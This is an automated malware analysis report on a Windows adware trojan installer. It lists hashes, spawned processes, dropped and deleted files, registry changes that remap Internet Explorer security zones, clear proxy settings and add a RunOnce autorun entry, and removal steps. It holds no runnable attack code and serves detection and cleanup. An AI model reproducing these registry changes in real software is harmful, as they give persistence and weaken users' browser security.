not-a-virus:AdWare.Win32.ConvertAd.ajzv (Kaspersky), Trojan.Generic.11726935 (AdAware), Trojan.NSIS.StartPage.FD, mzpefinder_pcap_file.YR (Lavasoft MAS)Behaviour: Trojan, Adware
The description has been automatically generated by Lavasoft Malware Analysis System and it may contain incomplete or inaccurate information.
Summary
MD5: 42c7df5771aed3248e8f04ac2affda17
SHA1: 1d7f06dbf7acf03b9be4331d4db120c222c8f374
SHA256: 64ecd33aaed204813ae3748835013aff5a9737a4f4b32072becf631f24f4d783
SSDeep: 6144:uzfj/cK4AtXPDtUoaZDM16 tBdiTqwpnGrJ0X:0/N1ZowZtBATXnOW
Size: 308560 bytes
File type: EXE
Platform: WIN32
Entropy: Packed
PEID: UPolyXv05_v6
Company: no certificate found
Created at: 2009-12-06 00:50:35
Analyzed on: WindowsXP SP3 32-bit
Summary: Trojan. A program that appears to do one thing but actually does another (a.k.a. Trojan Horse).
Dynamic Analysis
Payload
No specific payload has been found.
Process activity
The Trojan creates the following process(es):
nsoA.tmp:240
Full_Setup.exe:1912
%original file name%.exe:856
nsg16.tmp:1164
The Trojan injects its code into the following process(es):No processes have been created.
Mutexes
The following mutexes were created/opened:No objects were found.
File activity
The process nsoA.tmp:240 makes changes in the file system.
The Trojan creates and/or writes to the following file(s):
%Documents and Settings%\%current user%\Local Settings\Temp\Uninstall.exe (4152 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\8JST0V6P\ibf-cmi-1938953175.us-east-1.elb.amazonaws[1] (15 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsb19.tmp (15 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\F89OK2Q0\Validate[1].exe (4152 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\1TLH01PG\tJEcW[1] (5952 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\1TLH01PG\ibf-cmi-1938953175.us-east-1.elb.amazonaws[1] (15 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsu11.tmp (15 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsp12.tmp (15 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\F89OK2Q0\ibf-cmi-1938953175.us-east-1.elb.amazonaws[1] (15 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\H9EA3RRE\vos_n[1].htm (977 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsg16.tmp (5952 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsoF.tmp (11755 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsv14.tmp (977 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsu10.tmp\inetc.dll (784 bytes)
The Trojan deletes the following file(s):
%Documents and Settings%\%current user%\Local Settings\Temp\nsb19.tmp (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\1TLH01PG\ibf-cmi-1938953175.us-east-1.elb.amazonaws[1] (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsu11.tmp (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsp12.tmp (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsoE.tmp (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\F89OK2Q0\ibf-cmi-1938953175.us-east-1.elb.amazonaws[1] (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsu10.tmp (0 bytes)
The process Full_Setup.exe:1912 makes changes in the file system.
The Trojan creates and/or writes to the following file(s):
%Documents and Settings%\%current user%\Local Settings\Temp\nsdC.tmp (15 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsdB.tmp (15 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\1TLH01PG\ibf-cmi-1938953175.us-east-1.elb.amazonaws[1] (30 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nss9.tmp\inetc.dll (784 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsoA.tmp (7192 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nss8.tmp (15 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\F89OK2Q0\ibf-cmi-1938953175.us-east-1.elb.amazonaws[1] (30 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsjD.tmp (15 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsn7.tmp (6720 bytes)
The Trojan deletes the following file(s):
%Documents and Settings%\%current user%\Local Settings\Temp\nsn6.tmp (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsdC.tmp (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsdB.tmp (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\1TLH01PG\ibf-cmi-1938953175.us-east-1.elb.amazonaws[1] (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nss9.tmp (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nss9.tmp\inetc.dll (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nss8.tmp (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\F89OK2Q0\ibf-cmi-1938953175.us-east-1.elb.amazonaws[1] (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsjD.tmp (0 bytes)
The process %original file name%.exe:856 makes changes in the file system.
The Trojan creates and/or writes to the following file(s):
%Documents and Settings%\%current user%\Local Settings\Temp\nsd3.tmp\t1.dll (4 bytes)
%Documents and Settings%\%current user%\Application Data\InstallW\Full_Setup.exe (16664 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\F89OK2Q0\desktop.ini (67 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\8JST0V6P\0[1].gif (43 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\8JST0V6P\desktop.ini (67 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsb5.tmp (2 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsl17.tmp (43 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\H9EA3RRE\desktop.ini (67 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\8JST0V6P\r[1].htm (2 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\H9EA3RRE\CAEJCTMN.htm (16664 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsw18.tmp (2 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsd3.tmp\IpConfig.dll (4992 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\H9EA3RRE\r[1].htm (2 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\desktop.ini (67 bytes)
%Documents and Settings%\%current user%\Application Data\InstallW\Uninstall.exe (2967 bytes)
%Documents and Settings%\%current user%\Local Settings\History\History.IE5\desktop.ini (159 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\1TLH01PG\CAW1QV4X.htm (2 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\F89OK2Q0\0[1].gif (43 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\1TLH01PG\desktop.ini (67 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsd3.tmp\inetc.dll (784 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsa13.tmp (43 bytes)
%Documents and Settings%\%current user%\Cookies\Current_User@histats[1].txt (199 bytes)
%Documents and Settings%\%current user%\Application Data\InstallW\Resume.exe (1425 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsq15.tmp (43 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\1TLH01PG\0[1].gif (43 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsd3.tmp\WmiInspector.dll (3616 bytes)
%Documents and Settings%\%current user%\Cookies\index.dat (400 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsn4.tmp (2 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsd2.tmp (9120 bytes)
The Trojan deletes the following file(s):
%Documents and Settings%\%current user%\Local Settings\Temp\nsl17.tmp (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsn1.tmp (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsb5.tmp (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsq15.tmp (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsa13.tmp (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsd3.tmp (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsn4.tmp (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsw18.tmp (0 bytes)
The process nsg16.tmp:1164 makes changes in the file system.
The Trojan deletes the following file(s):
%Documents and Settings%\%current user%\Local Settings\Temp\nsx1A.tmp (0 bytes)
Registry activity
The process nsoA.tmp:240 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths]
"Directory" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path4]
"CacheLimit" = "65452"
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache4"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Connections]
"SavedLegacySettings" = "3C 00 00 00 1D 00 00 00 01 00 00 00 00 00 00 00"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"AppData" = "%Documents and Settings%\%current user%\Application Data"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd73-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cookies" = "%Documents and Settings%\%current user%\Cookies"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path2]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache2"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common AppData" = "%Documents and Settings%\All Users\Application Data"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd75-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cache" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files"
[HKLM\System\CurrentControlSet\Hardware Profiles\0001\Software\Microsoft\windows\CurrentVersion\Internet Settings]
"ProxyEnable" = "0"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path1]
"CacheLimit" = "65452"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path2]
"CacheLimit" = "65452"
[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "91 09 52 BF 70 EC 4B 64 A2 6F 47 D8 47 2C 99 E2"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path1]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache1"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path3]
"CacheLimit" = "65452"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"MigrateProxy" = "1"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd72-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{b98117e8-75ca-11e2-81b2-000c293708fb}]
"BaseClass" = "Drive"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path3]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache3"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths]
"Paths" = "4"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"History" = "%Documents and Settings%\%current user%\Local Settings\History"
The Trojan modifies IE settings for security zones to map all local web-nodes with no dots which do not refer to any zone to the Intranet Zone:
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"UNCAsIntranet" = "1"
The Trojan modifies IE settings for security zones to map all web-nodes that bypassing the proxy to the Intranet Zone:
"ProxyBypass" = "1"
Proxy settings are disabled:
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"ProxyEnable" = "0"
The Trojan modifies IE settings for security zones to map all urls to the Intranet Zone:
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"IntranetName" = "1"
The Trojan deletes the following value(s) in system registry:
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"AutoConfigURL"
"ProxyServer"
"ProxyOverride"
The process Full_Setup.exe:1912 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths]
"Directory" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path4]
"CacheLimit" = "65452"
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache4"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Connections]
"SavedLegacySettings" = "3C 00 00 00 1C 00 00 00 01 00 00 00 00 00 00 00"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"AppData" = "%Documents and Settings%\%current user%\Application Data"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd73-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cookies" = "%Documents and Settings%\%current user%\Cookies"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path2]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache2"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common AppData" = "%Documents and Settings%\All Users\Application Data"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd75-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cache" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files"
[HKLM\System\CurrentControlSet\Hardware Profiles\0001\Software\Microsoft\windows\CurrentVersion\Internet Settings]
"ProxyEnable" = "0"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path1]
"CacheLimit" = "65452"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path2]
"CacheLimit" = "65452"
[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "61 A0 EE 3E EA FF EC ED 9E E5 55 43 99 D5 13 B5"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path1]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache1"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path3]
"CacheLimit" = "65452"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"MigrateProxy" = "1"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd72-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{b98117e8-75ca-11e2-81b2-000c293708fb}]
"BaseClass" = "Drive"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path3]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache3"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths]
"Paths" = "4"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"History" = "%Documents and Settings%\%current user%\Local Settings\History"
The Trojan modifies IE settings for security zones to map all local web-nodes with no dots which do not refer to any zone to the Intranet Zone:
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"UNCAsIntranet" = "1"
The Trojan modifies IE settings for security zones to map all web-nodes that bypassing the proxy to the Intranet Zone:
"ProxyBypass" = "1"
Proxy settings are disabled:
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"ProxyEnable" = "0"
The Trojan modifies IE settings for security zones to map all urls to the Intranet Zone:
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"IntranetName" = "1"
The Trojan deletes the following value(s) in system registry:
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"AutoConfigURL"
"ProxyServer"
"ProxyOverride"
The process %original file name%.exe:856 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths]
"Directory" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path4]
"CacheLimit" = "65452"
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache4"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Connections]
"SavedLegacySettings" = "3C 00 00 00 1B 00 00 00 01 00 00 00 00 00 00 00"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"AppData" = "%Documents and Settings%\%current user%\Application Data"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\Resume]
"DisplayName" = "Installer Package"
"Publisher" = ""
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd73-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cookies" = "%Documents and Settings%\%current user%\Cookies"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path2]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache2"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common AppData" = "%Documents and Settings%\All Users\Application Data"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd75-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cache" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files"
[HKLM\System\CurrentControlSet\Hardware Profiles\0001\Software\Microsoft\windows\CurrentVersion\Internet Settings]
"ProxyEnable" = "0"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\Resume]
"DisplayVersion" = "1.0.0.0"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path1]
"CacheLimit" = "65452"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\Resume]
"UninstallString" = "%Documents and Settings%\%current user%\Application Data\InstallW\uninstall.exe"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path2]
"CacheLimit" = "65452"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\Resume]
"DisplayIcon" = "%Documents and Settings%\%current user%\Application Data\InstallW\uninstall.exe"
[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "6D 81 A8 B8 DE 6F 45 39 9D 06 7C F8 B7 83 15 F9"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path1]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache1"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path3]
"CacheLimit" = "65452"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"MigrateProxy" = "1"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd72-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{b98117e8-75ca-11e2-81b2-000c293708fb}]
"BaseClass" = "Drive"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path3]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache3"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths]
"Paths" = "4"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"History" = "%Documents and Settings%\%current user%\Local Settings\History"
To automatically run itself each time Windows is booted, the Trojan adds the following link to its file to the system registry autorun key:
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce]
"Finalize" = "%Documents and Settings%\%current user%\Application Data\InstallW\Full_Setup.exe /runonce"
The Trojan modifies IE settings for security zones to map all local web-nodes with no dots which do not refer to any zone to the Intranet Zone:
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"UNCAsIntranet" = "1"
The Trojan modifies IE settings for security zones to map all web-nodes that bypassing the proxy to the Intranet Zone:
"ProxyBypass" = "1"
Proxy settings are disabled:
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"ProxyEnable" = "0"
The Trojan modifies IE settings for security zones to map all urls to the Intranet Zone:
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"IntranetName" = "1"
The Trojan deletes the following value(s) in system registry:
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"AutoConfigURL"
"ProxyServer"
"ProxyOverride"
The process nsg16.tmp:1164 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:
[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "89 1B 75 21 A0 FB C6 32 EF B8 1E 34 62 03 0E E5"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd73-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd72-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{b98117e8-75ca-11e2-81b2-000c293708fb}]
"BaseClass" = "Drive"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd75-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"
Dropped PE files
| MD5 | File path |
|---|---|
| fb33b9c5234606a7dbf9247e01e8f86a | c:\Documents and Settings\"%CurrentUserName%"\Application Data\InstallW\Full_Setup.exe |
| ebce0562cbf6067824e005841744d1cf | c:\Documents and Settings\"%CurrentUserName%"\Application Data\InstallW\Uninstall.exe |
| 2a5f246b97d00f77b78d15f72923839b | c:\Documents and Settings\"%CurrentUserName%"\Local Settings\Temp\Uninstall.exe |
| a3ed6f7ea493b9644125d494fbf9a1e6 | c:\Documents and Settings\"%CurrentUserName%"\Local Settings\Temp\nsd3.tmp\IpConfig.dll |
| 8531346d16fa5d4768f6530d2eb2b65c | c:\Documents and Settings\"%CurrentUserName%"\Local Settings\Temp\nsd3.tmp\WmiInspector.dll |
| f02155fa3e59a8fc48a74a236b2bb42e | c:\Documents and Settings\"%CurrentUserName%"\Local Settings\Temp\nsd3.tmp\inetc.dll |
| 058ba8a0916d957d3b91d08ea2e876e2 | c:\Documents and Settings\"%CurrentUserName%"\Local Settings\Temp\nsd3.tmp\t1.dll |
| bb25f5faf1d2329cbad8b763695bc518 | c:\Documents and Settings\"%CurrentUserName%"\Local Settings\Temp\nsg16.tmp |
| 8501f079ef3fc63721d0164b8a34b4a9 | c:\Documents and Settings\"%CurrentUserName%"\Local Settings\Temp\nsoA.tmp |
| f02155fa3e59a8fc48a74a236b2bb42e | c:\Documents and Settings\"%CurrentUserName%"\Local Settings\Temp\nsu10.tmp\inetc.dll |
| bb25f5faf1d2329cbad8b763695bc518 | c:\Documents and Settings\"%CurrentUserName%"\Local Settings\Temporary Internet Files\Content.IE5\1TLH01PG\tJEcW[1] |
| 2a5f246b97d00f77b78d15f72923839b | c:\Documents and Settings\"%CurrentUserName%"\Local Settings\Temporary Internet Files\Content.IE5\F89OK2Q0\Validate[1].exe |
| fb33b9c5234606a7dbf9247e01e8f86a | c:\Documents and Settings\"%CurrentUserName%"\Local Settings\Temporary Internet Files\Content.IE5\H9EA3RRE\CAEJCTMN.htm |
HOSTS file anomalies
No changes have been detected.
Rootkit activity
No anomalies have been detected.
Propagation
Removals
Remove it with Ad-Aware
- Click (here) to download and install Ad-Aware Free Antivirus.
- Update the definition files.
- Run a full scan of your computer.
Manual removal*
- Terminate malicious process(es) (How to End a Process With the Task Manager):
nsoA.tmp:240
Full_Setup.exe:1912
%original file name%.exe:856
nsg16.tmp:1164 - Delete the original Trojan file.
- Delete or disinfect the following files created/modified by the Trojan:
%Documents and Settings%\%current user%\Local Settings\Temp\Uninstall.exe (4152 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\8JST0V6P\ibf-cmi-1938953175.us-east-1.elb.amazonaws[1] (15 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsb19.tmp (15 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\F89OK2Q0\Validate[1].exe (4152 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\1TLH01PG\tJEcW[1] (5952 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\1TLH01PG\ibf-cmi-1938953175.us-east-1.elb.amazonaws[1] (15 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsu11.tmp (15 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsp12.tmp (15 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\F89OK2Q0\ibf-cmi-1938953175.us-east-1.elb.amazonaws[1] (15 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\H9EA3RRE\vos_n[1].htm (977 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsg16.tmp (5952 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsoF.tmp (11755 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsv14.tmp (977 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsu10.tmp\inetc.dll (784 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsdC.tmp (15 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsdB.tmp (15 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nss9.tmp\inetc.dll (784 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsoA.tmp (7192 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nss8.tmp (15 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsjD.tmp (15 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsn7.tmp (6720 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsd3.tmp\t1.dll (4 bytes)
%Documents and Settings%\%current user%\Application Data\InstallW\Full_Setup.exe (16664 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\F89OK2Q0\desktop.ini (67 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\8JST0V6P\0[1].gif (43 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\8JST0V6P\desktop.ini (67 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsb5.tmp (2 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsl17.tmp (43 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\H9EA3RRE\desktop.ini (67 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\8JST0V6P\r[1].htm (2 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\H9EA3RRE\CAEJCTMN.htm (16664 bytes)
